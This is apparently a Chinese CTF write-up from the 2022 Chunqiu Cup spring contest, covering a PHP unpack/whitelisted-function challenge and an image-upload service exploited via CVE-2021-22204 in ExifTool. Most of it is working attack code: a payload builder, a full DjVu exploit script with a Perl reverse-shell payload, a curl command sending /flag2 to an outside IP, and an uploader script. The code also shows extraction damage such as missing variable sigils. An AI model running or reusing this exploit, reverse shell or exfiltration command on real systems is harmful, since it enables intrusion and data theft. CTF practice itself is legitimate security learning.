2022年春秋杯网络安全联赛春季赛勇者山峰
easy_php
题目内容:pwner:我决定我要开始卷web了,我该怎么学呢?算了,先从基础的php开始学起吧。
index.php
代码语言:javascript复制 <?php
highlight_file(__FILE__);
error_reporting(0);
function createFolder(path)
{
if (!file_exists(path)) {
createFolder(dirname(path));
mkdir(path, 0777);
}
}
function savePostData()
{
content =GLOBALS['HTTP_RAW_POST_DATA'];
if (empty(content)) {content = file_get_contents('php://input');
}
if (content == null) {
exit(0);
}format = 'lnDataLen/lnHeadLen/lnPackTotal/lnPackNum/lnFileNameLen/lnFileDataLen';
head = unpack("format", content);
unset(format);
format = 'lnDataLen/lnHeadLen/lnPackTotal/lnPackNum/lnFileNameLen/lnFileDataLen' . '/a' . (head["nFileNameLen"]) . 'chFileName' . '/a' . (head["nFileDataLen"]) . 'data';head = unpack("format",content);
if (is_string(head["chFileName"])) {fileName = head["chFileName"];white_func = array("readfile","unserialize","phpinfo");
if (!in_array(fileName,white_func)) {
exit("hi hack!");
}
fileName(head["data"]);
}
echo "FAIL";
}
savePostData();
?> 得到构造相应的unpack数据的方法
代码语言:javascript复制<?php
function savePostData(fn,data)
{
datalen=strlen(data);
fnlen=strlen(fn);
content=pack("l6a".fnlen."a".datalen,1,2,3,4,fnlen,datalen,fn,data);
var_dump(urlencode(content),strlen(content));
}white_func = array("readfile","unserialize","phpinfo");
savePostData($white_func[2],'99999');将得到的数据在burp的6进制页面逐个插入字符
bash CVE-2021-22204.sh "system('ls -al /> /tmp/1')" poc2.jpg && python3 1.py
bash CVE-2021-22204.sh "system('curl -F "file=@/flag2" 47.99.70.18:4444')" poc2.jpg && python3 1.py一道python,名字叫啥不记得了
只出了exif漏洞的一半flag(/flag1)还有一半flag是convert漏洞的没做出来,网上下了很多POC都没反应(其实exif漏洞也是,最后找到下面这个可用脚本):
代码语言:javascript复制#!/bin/bash
RS='�33[0m'
R='�33[0;31m'
G='�33[0;32m'
LB='�33[1;34m'
CY='�33[0;36m'
W='�33[1;73m'
art=(base64 -d <<< "H4sIAFNGCWEA/52OMRLEIAwD 7xiy1Dxm6s8w0f8 KxyUFx7eGQhodgBVs4viy8ptz5Qx75gqoqSc2sLBtRLHcfLgX6TusTtmOLDbEytlQn3yCATW5/Sz6DVbizf2j7fVDPteiHX 0f5diM 5rLxz/MATvFQnxwBAAA=" | gunzip)
printf "{G}art{RS}"
# Check for params
if [ {#@} -lt 2 ]; then
echo -e "nUsage: ./CVE-2021-22204 cmd image.jpg"
echo -e "Eg: ./CVE-2021-22204 "system('id')" kitten.jpg" echo -e "Reverseshell: ./CVE-2021-22204 "reverseme IP PORT" image.jpg"
exit
fi
# Check djvulibre is installed.
if [(dpkg-query -W -f='{Status}' "djvulibre-bin" 2>/dev/null | grep -c "ok installed") -eq 0 ];then
echo -e -n "n{R}Warning:{RS} djvulibre-bin is not installed.n"
echo -e "{G}Confirm: {RS}"
read -p "Install djvulibre-bin now? (y/n):"confirm
if [[{confirm} =~ ^([yY][eE][sS]|[yY])]]; then
sudo apt-get install djvulibre-bin -y
else
exit
fi
fi
# Create payload
echo -e "nCreating payload"
cmd="1"
if [[ "{cmd:0:9}" = "reverseme" ]]; then
ip=(echo "cmd"| cut -d"" -f 2)
port=(echo "cmd"| cut -d"" -f 3)
echo "IP:ip"
echo "PORT: port"
cat <<EOF> payload
(metadata "c${use Socket;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in(port,inet_aton('ip')))){open(STDIN,'>&S');open(STDOUT,'>&S');open(STDERR,'>&S');exec('/bin/sh -i');};};};")
EOF
else
cat <<EOF>payload
(metadata "c${1};")
EOF
fi
cat payload
echo -e "n"
# Compress payload
bzz payload payload.bzz
# INFO = Anything in the format 'N,N' where N is a number
# BGjp = Expects a JPEG image, but we can use /dev/null to use nothing as background image
# ANTz = Will write the compressed annotation chunk with the input file
djvumake exploit.djvu INFO='1,1' BGjp=/dev/null ANTz=payload.bzz
cat <<EOF> configfile
%Image::ExifTool::UserDefined = (
# All EXIF tags are added to the Main table, and WriteGroup is used to
# specify where the tag is written (default is ExifIFD if not specified):
'Image::ExifTool::Exif::Main' => {
# Example 1. EXIF:NewEXIFTag
0xc51b => {
Name => 'HasselbladExif',
Writable => 'string',
WriteGroup => 'IFD0',
},
# add more user-defined EXIF tags here...
},
);
1; #end%
EOF
exiftool -config configfile '-HasselbladExif<=exploit.djvu' "2"
rm configfile payload.bzz payload exploit.djvu
echo -e -n "n{G}Finished${RS}"得到前半段flag的poc:
代码语言:javascript复制import os,sys
import threading
import requests
url="http://eci-2ze4iv6httpb9dlwbvru.cloudeci1.ichunqiu.com:8888"
session=requests.session()
# cmd=sys.argv[1]
# os.system(f"bash CVE-2021-22204.sh "{cmd}" poc2.jpg")
file=open("poc2.jpg","rb").read()
files = [
('file', ('curl4444.jpg', file, 'image/jpeg')),
]
print(session.post(url "/upload", files=files).text)
print(session.get(url "/info").text)
print(session.get(url "/convert").text.split('"')[-2])
